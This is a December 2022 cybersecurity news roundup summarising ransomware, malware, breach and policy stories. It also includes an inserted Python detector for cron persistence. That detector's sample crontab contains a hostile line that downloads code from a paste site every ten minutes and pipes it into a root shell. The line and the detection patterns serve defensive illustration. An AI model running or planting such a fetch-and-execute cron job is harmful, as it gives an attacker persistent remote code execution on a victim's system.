Monday, December 12, 2022
Iran thwarts hackers’ attack on Imam Khomeini Airport City
FROM THE MEDIA: Iranian cybersecurity experts have foiled a hacking attack on Imam Khomeini Airport City in the south of the capital Tehran, preventing any major interruption in the airport’s operations. Iran’s Tasnim news agency quoted Mohammad Ja’farabadi, the director general of the airport, as saying on Monday that the so-called Anonymous hackers launched a distributed denial-of-service (DDoS) attack on the website of the airport on Sunday. “As a result, there were problems in the airport’s operations for about fifteen minutes. However, the airport city’s multilayered support system prevented the hackers from taking control of its website,” the official said.
READ THE STORY: PressTV
Post-quantum cryptography experts brace for long transition despite White House deadlines
FROM THE MEDIA: The White House’s aggressive deadlines for agencies to develop post-quantum cryptography strategies make the U.S. the global leader on protection, but the transition will take at least a decade, experts say. Canada led the Western world in considering a switch to post-quantum cryptography (PQC) prior to the Office of Management and Budget issuing its benchmark-setting memo on Nov. 18, which has agencies running to next-generation encryption companies with questions about next steps. The memo gives agencies until May 4, 2023, to submit their first cryptographic system inventories identifying vulnerable systems, but they’ll find the number of systems reliant on public-key encryption — which experts predict forthcoming quantum computers will crack with ease — is in the hundreds or thousands.
READ THE STORY: FEDSCOOP
Congress must pass Cornyn-Schumer’s NDAA microchips amendment
FROM THE MEDIA: While the COVID-19 pandemic opened the American public’s eyes to many aspects of governmental policy, perhaps the most striking was the realization that the nation has become too dependent on China for critical goods. From medical to high-tech devices, the American people began to clearly recognize that they could no longer remain beholden to the communist nation for life’s necessities. As a former up-and-coming member of the Chinese Communist Party before fleeing to the United States and becoming a leading American activist against it, I can attest to the urgent need for the U.S. to divest from China in areas of health and security importance.
READ THE STORY: Washington Times
TrueBot malware delivery evolves, now infects businesses in the US and elsewhere
FROM THE MEDIA: New research from Cisco Talos reveals that the infamous TrueBot malware has updated its modus operandi and now hits the U.S. with additional payloads such as the Clop ransomware. According to Cisco Talos, TrueBot malware now collects Active Directory information, which means it targets businesses with larger IT resources. In addition to targeting larger organizations, the malware is experimenting with new delivery methods: Netwrix Auditor bundled with the Raspberry Robin malware. TrueBot is a downloader malware under active development since 2017. Its goal is to infect systems, collect information on the compromised host to help triage the targets, and deploy additional malware.
READ THE STORY: TechRepublic
LockBit ransomware crew claims attack on California Department of Finance
FROM THE MEDIA: A notorious and prolific ransomware operation claimed on Monday to have stolen 76 gigabytes of data from the California Department of Finance. In a statement on its website posted early Monday, LockBit — a group the U.S. Department of Justice describes as one of the “most active and destructive ransomware variants in the world” — announced that it targeted systems belonging to the California Department of Finance and gave the agency a Dec. 24 deadline, when the group is threatening that it will publish the stolen files.
READ THE STORY: CYBERSCOOP
Indian foreign ministry’s Global Pravasi Rishta portal leaks expat passport details
FROM THE MEDIA: The Cybernews research team has been alerted that the Global Pravasi Rishta Portal was leaking sensitive user data. Unfortunately, the tip proved accurate. The platform exposed user names, surnames, country of residence, and email addresses in plaintext, as well as occupation status, phone and passport numbers. The leak was possible because of poor security measures, such as a lack of authentication methods. The Global Pravasi Rishta Portal is a platform with the goal of connecting 30 million Indian expats. The platform owner is the Ministry of External Affairs of India, the country’s government body responsible for implementing foreign policy.
READ THE STORY: Security Affairs
Fortinet urges customers to fix actively exploited FortiOS SSL-VPN bug
FROM THE MEDIA: Fortinet urges customers to update their installs to address an actively exploited FortiOS SSL-VPN vulnerability, tracked as CVE-2022-42475, that could be exploited by an unauthenticated, remote attacker to execute arbitrary code on devices. The CVE-2022-42475 flaw is a heap-based buffer overflow issue that resides in FortiOS sslvpnd. “A heap-based buffer overflow vulnerability [CWE-122] in FortiOS SSL-VPN may allow a remote unauthenticated attacker to execute arbitrary code or commands via specifically crafted requests,” reads the advisory published by the security vendor. “Fortinet is aware of an instance where this vulnerability was exploited in the wild.”
READ THE STORY: Security Affairs
Japan to amend laws to allow for offensive cyber operations against foreign hackers
FROM THE MEDIA: The Japanese government is planning to introduce new laws that will allow it to engage in offensive cyber operations for the purposes of defending itself. The Nikkei reported that the government will make “legislative changes so it can begin monitoring potential attackers and hack their systems as soon as signs of a potential risk are established.” Documents seen by the newspaper state that Japan will strengthen its cyber defense “to a level equal to major Western powers” and include measures for “active cyber defense” allowing the authorities to intervene before damage is caused, even when there is no use of traditional force against the country.
READ THE STORY: The Record
Xnspy stalkerware spied on thousands of iPhones and Android devices
FROM THE MEDIA: A little-known phone monitoring app called Xnspy has stolen data from tens of thousands of iPhones and Android devices, the majority of whose owners are unaware that their data has been compromised. Xnspy is one of many so-called stalkerware apps sold under the guise of allowing a parent to monitor their child’s activities, but which are explicitly marketed for spying on a spouse or domestic partner’s devices without their permission. Its website boasts, “to catch a cheating spouse, you need Xnspy on your side,” and, “Xnspy makes reporting and data extraction simple for you.”
READ THE STORY: TC
North Korean Cyber Spies’ New Tactic: Tricking Experts Into Writing Research for Them
FROM THE MEDIA: The sender was actually a suspected North Korean spy seeking information, according to those involved and three cybersecurity researchers. Instead of infecting his computer and stealing sensitive data, as hackers typically do, the sender appeared to be trying to elicit his thoughts on North Korean security issues by pretending to be 38 North director Jenny Town. “I realized it wasn’t legit once I contacted the person with follow-up questions and found out there was, in fact, no request that was made, and that this person was also a target,” DePetris told Reuters, referring to Town. “So I figured out pretty quickly this was a widespread campaign.”
READ THE STORY: Insurance Journal
Cryptomining campaign targets Linux systems with Go-based CHAOS Malware
FROM THE MEDIA: In November 2022, Trend Micro researchers discovered a cryptocurrency mining campaign targeting Linux users with Go-based CHAOS malware (Trojan.Linux.CHAOSRAT). The Chaos RAT is based on an open-source project. Like the original project, the malware is able to terminate competing malware and security software, and it is used to deploy the Monero (XMR) cryptocurrency miner. The malware maintains persistence by altering the /etc/crontab file and downloads itself every 10 minutes from Pastebin. “This is followed by downloading additional payloads: an XMRig miner, its configuration file, a shell script looping ‘competition killer,’ and most importantly, the RAT itself,” reads the analysis published by Trend Micro.
READ THE STORY: Security Affairs
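As an added defender-side example (not from the Trend Micro report or any code on this page), the script below parses system-crontab lines and flags jobs matching the persistence pattern described above: a short-interval entry that re-fetches a payload from a paste site and pipes it into a shell. The crontab content, the paste-site watchlist and the `EXAMPLE_ID` path are constructed for illustration.

```python
import re

# Constructed sample /etc/crontab (not taken from the Trend Micro report).
# The last entry mimics the persistence pattern described above: a job that
# re-fetches a payload from Pastebin every 10 minutes and pipes it into a shell.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin
17 *  * * *  root  cd / && run-parts --report /etc/cron.hourly
0 3   * * *  root  /usr/local/bin/backup.sh
*/10 * * * *  root  curl -fsSL https://pastebin.com/raw/EXAMPLE_ID | sh
"""

PASTE_HOSTS = ("pastebin.com", "paste.ee", "hastebin.com")  # assumed watchlist
FETCH_TOOL = re.compile(r"\b(curl|wget)\b")
PIPE_TO_SHELL = re.compile(r"\|\s*(sh|bash|dash)\b")

def parse_system_crontab(text):
    """Yield (minute_field, user, command, raw_line) for each job line."""
    for raw in text.splitlines():
        line = raw.strip()
        # Skip blanks, comments and VAR=value assignments (SHELL=, PATH=, ...)
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        fields = line.split(None, 6)  # minute hour dom month dow user command
        if len(fields) == 7:
            yield fields[0], fields[5], fields[6], raw

def step_interval(minute_field):
    """Return N for a '*/N' minute field, else None (not a fixed step)."""
    m = re.fullmatch(r"\*/(\d+)", minute_field)
    return int(m.group(1)) if m else None

def flag_suspicious_jobs(text, max_interval=10):
    """Return [(raw_line, [reasons])] for jobs matching the CHAOS-style pattern."""
    hits = []
    for minute, user, cmd, raw in parse_system_crontab(text):
        reasons = []
        fetches = bool(FETCH_TOOL.search(cmd))
        if any(host in cmd for host in PASTE_HOSTS):
            reasons.append("downloads from a paste site")
        if fetches and PIPE_TO_SHELL.search(cmd):
            reasons.append("pipes a download straight into a shell")
        interval = step_interval(minute)
        if fetches and interval is not None and interval <= max_interval:
            reasons.append(f"re-fetches every {interval} min as {user}")
        if reasons:
            hits.append((raw, reasons))
    return hits
```

Running `flag_suspicious_jobs(SAMPLE_CRONTAB)` flags only the `*/10` entry, with all three reasons; the two housekeeping jobs pass.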
Ukrainian railway, state agencies allegedly targeted by DolphinCape malware
FROM THE MEDIA: Ukrainian government agencies and the state railway are the latest victims of a new wave of phishing attacks, Ukraine’s Computer Emergency Response Team (CERT-UA) reported last week. The attacks involved an email campaign in which hackers sent out messages purportedly on behalf of Ukraine’s State Emergency Service with tips on how to identify a kamikaze drone, capitalizing on fears over the Russian use of Iranian-made Shahed-136 kamikaze drones to target crucial energy infrastructure in Ukraine. The attackers, tracked by CERT-UA as UAC-0140, used the emails to distribute the DolphinCape malware, developed with the Delphi programming language.
READ THE STORY: The Record
Royal Ransomware Targets US Healthcare
FROM THE MEDIA: The ransomware group known as Royal has been targeting the healthcare industry in the US, warned the Health Department (HC3) last week. "HC3 is aware of attacks against the Healthcare and Public Healthcare (HPH) sector," wrote the department in an analyst note last Wednesday. "Due to the historical nature of ransomware victimizing the healthcare community, Royal should be considered a threat to the HPH sector." According to the analyst note, requested ransom payment demands ranged from $250,000 to over $2m.
READ THE STORY: InfoSecMag
Major Android Security Leak: Manufacturer Signing Keys Used To Validate Malware Apps
FROM THE MEDIA: A security leak involving manufacturer signing keys from major device producers (such as LG and Samsung) has created a path for malware apps to make it onto user devices in the guise of legitimate updates. These malware apps can give an attacker full access to an Android device, as the operating system grants any app signed with such a key complete system-level access. This attack would not necessarily require the end user to download a new app; the malicious code could be inserted as an update to an existing app on the device. It would not matter whether the app had originally been installed via the Play Store, a manufacturer-specific outlet such as the Galaxy Store, or sideloaded independently onto the device.
READ THE STORY: CPOMAG
Evilnum group targets legal entities with a new Janicab variant
FROM THE MEDIA: Kaspersky researchers reported that a hack-for-hire group dubbed Evilnum is targeting travel and financial entities. The attacks are part of a campaign aimed at legal and financial investment institutions in the Middle East and Europe. The campaign took place in 2020 and 2021, but experts speculate it has been active since 2015. The threat actors employed a new variant of the Janicab malware that relies on public services like WordPress and YouTube as dead drop resolvers. The researchers spotted the new variant while investigating Evilnum (aka DeathStalker) intrusions that use the Janicab malware family. The experts believe DeathStalker is a group of mercenaries or threat actors that act as an information broker in financial circles.
READ THE STORY: Security Affairs
“Misleading attack” threatens blockchain security
FROM THE MEDIA: The cyber threat received its name from its misleading nature: it attempts to deceive miners – those who mine digital currencies and validate transactions on a blockchain. Specifically, the attack steals some of their computational power and redirects it to a different chain. “The misleading attack is orchestrated by someone who redirects some miners’ computational power to a different chain, so that it (the attacker) can outrun the main chain and thus make its fork the dominant one,” CDU Professor Mamoun Alazab said. According to Alazab, through a series of competition losses, the threat actor’s chain becomes the dominant one. Not only does this attack have a high success rate, but it also increases the success rates of other blockchain attacks.
READ THE STORY: Cybernews
Twitter confirms recent user data leak is from 2021 breach
FROM THE MEDIA: Twitter confirmed today that the recent leak of millions of members' profiles, including private phone numbers and email addresses, resulted from the same data breach the company disclosed in August 2022. Twitter says its incident response team analyzed the user data leaked in November 2022 and confirmed it was collected using the same vulnerability before it was fixed in January 2022. "In November 2022, some press reports published that Twitter users' data had been allegedly leaked online," reads the update. In January 2022, Twitter received a report through its bug bounty program that an API vulnerability allowed an attacker to feed in email addresses or phone numbers and get the associated Twitter ID for a registered account.
READ THE STORY: Bleeping Computer
Uber suffers new data breach after attack on vendor, info leaked online
FROM THE MEDIA: Uber has suffered a new data breach after a threat actor leaked employee email addresses, corporate reports, and IT asset information stolen from a third-party vendor in a cybersecurity incident. Early Saturday morning, a threat actor named 'UberLeaks' began leaking data allegedly stolen from Uber and Uber Eats on a hacking forum known for publishing data breaches. The leaked data includes numerous archives claiming to be source code associated with mobile device management platforms (MDM) used by Uber and Uber Eats and third-party vendor services.
READ THE STORY: Bleeping Computer
FCC to update satellite rules
FROM THE MEDIA: A US bipartisan House Energy & Commerce Committee has introduced potential legislation to update the FCC’s current satellite licensing rules. One aspect will be the prohibition of Chinese businesses, although it is not yet completely clear whether the legislation will cover satellites where ownership – as distinct from components – includes Chinese companies. This could affect Eutelsat and its merger with OneWeb, for example. Eutelsat has a Chinese shareholder. The legislation also covers Russia, although again further clarity will be needed on operators which are correctly licensed by the ITU and how that would impact their US services.
READ THE STORY: Advanced Television
Items of interest
Technical issue likely to blame for Iranian news channel outage, says Eutelsat
FROM THE MEDIA: A technical issue likely knocked Iran’s Press TV temporarily off the air last week, Eutelsat said as the French satellite operator calls on partners to stop broadcasting the news channel to comply with European sanctions. The Iranian state-owned news network lashed out at Eutelsat Dec. 7 via Twitter and an article — which has since been updated — after losing service for what it described as an attack on free speech. Press TV initially said Eutelsat had “taken Press TV off air” before updating the article’s text to instead focus on a notification about plans to drop the channel without mentioning the service outage.
READ THE STORY: SN
The State of Data Security: The Human Impact of Cybercrime (Video)
FROM THE MEDIA: Over one-third of organizations had a leadership change in the last year due to a cyberattack and its follow-on response.
Blurring the Lines Between Espionage and Cybercrime with Rafe Pilling (Video)
FROM THE MEDIA: Since 2020, Iranian threat groups have been conducting disruptive operations in Israel, quickly spreading to other parts of the world.
These open source products are reviewed from analysts at InfoDom Securities and provide possible context about current media trends in regard to the realm of cyber security. The stories selected cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not specifically endorse any third-party claims made in their original material or related links on their sites, and the opinions expressed by third parties are theirs alone. Contact InfoDom Securities at dominanceinformation@gmail.com